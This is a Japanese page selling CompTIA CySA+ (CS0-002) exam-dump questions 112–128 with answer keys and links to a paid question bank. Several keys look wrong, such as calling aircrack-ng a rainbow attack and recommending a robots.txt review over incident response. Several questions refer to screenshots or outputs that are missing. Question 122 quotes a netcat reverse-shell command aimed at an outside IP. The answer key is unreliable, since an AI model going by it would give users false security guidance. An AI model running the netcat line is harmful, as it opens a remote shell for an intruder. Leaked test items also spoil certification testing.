最新のCS0-002学習ガイド2024年最新の- 提供するのはテストエンジンとPDF [Q112-Q128]

Share

最新のCS0-002学習ガイド2024年最新の- 提供するのはテストエンジンとPDF

最新版を今すぐ試そうCS0-002練習テスト問題解答が待ってます


CompTIAサイバーセキュリティアナリスト(CYSA+)認定試験は、サイバーセキュリティアナリストの役割を効果的に実行するために必要な知識とスキルをテストする包括的な認定試験です。この試験は、サイバーセキュリティ分析に関連する幅広いトピックをカバーしており、世界中の多くの組織によって認識されています。この認定は、サイバーセキュリティ業界でのキャリアを促進しようとする専門家や、雇用市場で競争力を獲得しようとしている人に最適です。

 

質問 # 112
Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base requirements?

  • A. Security regression testing
  • B. User acceptance testing
  • C. Stress testing
  • D. Code review

正解:B

解説:
"User acceptance testing (UAT) is the last phase of the software testing process. During UAT, actual software users test the software to make sure it can handle required tasks in real-world scenarios, according to specifications." https://www.plutora.com/blog/uat-user-acceptance-testing


質問 # 113
Industry partners from critical infrastructure organizations were victims of attacks on their SCADA devices.
The attacker was able to gain access to the SCADA by logging in to an account with weak credentials. Which of the following identity and access management solutions would help to mitigate this risk?

  • A. Multifactor authentication
  • B. Manual access reviews
  • C. Endpoint detection and response
  • D. Role-based access control

正解:D

解説:
Explanation
RBAC helps organizations manage access to critical infrastructure networks by assigning access based on roles. This allows organizations to control who can access specific resources and helps eliminate weak credentials that attackers could exploit. Manual reviews and endpoint detection and response can also help to mitigate risk, but role based access control is the best solution for this scenario.


質問 # 114
A Chief Information Security Officer has asked for a list of hosts that have critical and high-severity findings as referenced in the CVE database. Which of the following tools would produce the assessment output needed to satisfy this request?

  • A. Nessus
  • B. Prowler
  • C. Fuzzer
  • D. Wireshark
  • E. Nikto

正解:A


質問 # 115
Which of the following is the best method to review and assess the security of the cloud service models used by a company on multiple CSPs?

  • A. Unifying and migrating all services in a single CSP
  • B. Executing an API hardening process on the CSPs' endpoints
  • C. Deploying cloud instances using Nikto and OpenVAS
  • D. Integrating the security benchmarks of the CSPs with a CASB

正解:D

解説:
This is the best method to review and assess the security of the cloud service models used by a company on multiple CSPs. CSP stands for cloud service provider, which is a company that offers cloud-based services such as infrastructure, platform, or software. CASB stands for cloud access security broker, which is a software or service that acts as a gateway between the company and the CSPs, and provides visibility, control, compliance, and threat protection for the cloud services.
Integrating the security benchmarks of the CSPs with a CASB means that the company can use a common set of standards and metrics to measure and compare the security posture and performance of different cloud service models, such as IaaS, PaaS, or SaaS. Security benchmarks are predefined criteria or best practices that define the minimum level of security required for a cloud service model. For example, some security benchmarks may include encryption, authentication, logging, auditing, patching, backup, etc. By integrating these benchmarks with a CASB, the company can monitor and enforce them across multiple CSPs, and identify any gaps or risks in their cloud security.


質問 # 116
A company is experiencing a malware attack within its network. A security engineer notices many of the impacted assets are connecting outbound to a number of remote destinations and exfiltrating dat a. The security engineer also see that deployed, up-to-date antivirus signatures are ineffective. Which of the following is the BEST approach to prevent any impact to the company from similar attacks in the future?

  • A. Port security
  • B. IDS signatures
  • C. Sinkholing
  • D. Data loss prevention

正解:C

解説:
Sinkholing is a technique for manipulating data flow in a network; you redirect traffic from its intended destination to the server of your choosing. It can be used maliciously, to steer legitimate traffic away from its intended recipient, but security professionals more commonly use sinkholing as a tool for research and reacting to attacks1 Sinkholing can help prevent any impact to the company from similar attacks in the future by redirecting the malicious traffic from the compromised assets to a sinkhole server, where it can be monitored, analyzed, or blocked. Sinkholing can also prevent the compromised assets from communicating with their command and control servers or exfiltrating data to remote destinations.


質問 # 117
The help desk provided a security analyst with a screenshot of a user's desktop:

For which of the following is aircrack-ng being used?

  • A. Brute-force attack
  • B. Wireless access point discovery
  • C. PCAP data collection
  • D. Rainbow attack

正解:D


質問 # 118
A security analyst was alerted to a tile integrity monitoring event based on a change to the vhost-paymonts .conf file The output of the diff command against the known-good backup reads as follows

Which of the following MOST likely occurred?

  • A. The file was altered to harvest credit card numbers
  • B. The file was altered to avoid logging credit card information
  • C. The file was altered to accept payments without charging the cards
  • D. The file was altered to verify the card numbers are valid.

正解:C


質問 # 119
While investigating an incident in a company's SIEM console, a security analyst found hundreds of failed SSH login attempts, which all occurred in rapid succession. The failed attempts were followed by a successful login on the root user Company policy allows systems administrators to manage their systems only from the company's internal network using their assigned corporate logins. Which of the following are the BEST actions the analyst can take to stop any further compromise? (Select TWO).

  • A. Add a rule on the affected system to block access to port TCP/22.
  • B. Configure /etc/sshd_config to deny root logins and restart the SSHD service.
  • C. Reset the passwords for all accounts on the affected system.
  • D. Add a rule on the perimeter firewall to block the source IP address.
  • E. Add a rule on the network IPS to block SSH user sessions
  • F. Configure /etc/passwd to deny root logins and restart the SSHD service.

正解:B、D


質問 # 120
An organization that handles sensitive financial information wants to perform tokenization of data to enable the execution of recurring transactions. The organization is most interested in a secure, built-in device to support its solution. Which of the following would MOST likely be required to perform the desired function?

  • A. UEFI
  • B. FPGA
  • C. HSM
  • D. TPM
  • E. eFuse

正解:D


質問 # 121
While analyzing logs from a WAF, a cybersecurity analyst finds the following:

Which of the following BEST describes what the analyst has found?

  • A. This is an encrypted packet
  • B. This is an encrypted GET HTTP request
  • C. A packet is being used to bypass the WAF
  • D. This is an encoded WAF bypass

正解:D


質問 # 122
A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

In some of the portal's startup command files, the following command appears:
nc -o /bin/sh 72.14.1.36 4444
Investigating further, the analyst runs Netstat and obtains the following output

Which of the following is the best step for the analyst to take NEXT?

  • A. Patch a new vulnerability that has been discovered
  • B. Delete the unknown files from the production servers
  • C. Recommend training to avoid mistakes in production command files
  • D. Initiate the security incident response process
  • E. Manually review the robots .txt file for errors

正解:E


質問 # 123
After receiving reports latency, a security analyst performs an Nmap scan and observes the following output:

Which of the following suggests the system that produced output was compromised?

  • A. There are no indicators of compromise on this system.
  • B. Secure shell is operating of compromise on this system.
  • C. Standard HTP is open on the system and should be closed.
  • D. MySQL services is identified on a standard PostgreSQL port.

正解:A


質問 # 124
Which of the following is the BEST security practice to prevent ActiveX controls from running malicious code on a user's web application?

  • A. Configuring a firewall to block traffic on ports that use ActiveX controls
  • B. Deploying HIPS to block malicious ActiveX code
  • C. Installing network-based IPS to block malicious ActiveX code
  • D. Adjusting the web-browser settings to block ActiveX controls

正解:B


質問 # 125
A user's computer has been running slowly when the user tries to access web pages. A security analyst runs the command netstat -aonfrom the command line and receives the following output:

Which of the following lines indicates the computer may be compromised?

  • A. Line 3
  • B. Line 2
  • C. Line 6
  • D. Line 1
  • E. Line 4
  • F. Line 5

正解:E


質問 # 126
An alert has been distributed throughout the information security community regarding a critical Apache vulnerability.
Which of the following courses of action would ONLY identify the known vulnerability?

  • A. Perform an authenticated scan on all web servers in the environment.
  • B. Perform an unauthenticated vulnerability scan on all servers in the environment.
  • C. Perform a scan for the specific vulnerability on all web servers.
  • D. Perform a web vulnerability scan on all servers in the environment.

正解:C


質問 # 127
A penetration tester is preparing for an audit of critical systems that may impact the security of the environment. This includes the external perimeter and the internal perimeter of the environment.
During which of the following processes is this type of information normally gathered?

  • A. Enumeration
  • B. Authorization
  • C. Scoping
  • D. Timing

正解:C


質問 # 128
......

CS0-002問題集と試験テストエンジン:https://www.passtest.jp/CompTIA/CS0-002-shiken.html

CompTIA CS0-002問題集にはリアル試験問題解答:https://drive.google.com/open?id=1y6ma-UTFHc9HO-VDTYAvoaUpAuc2rFGv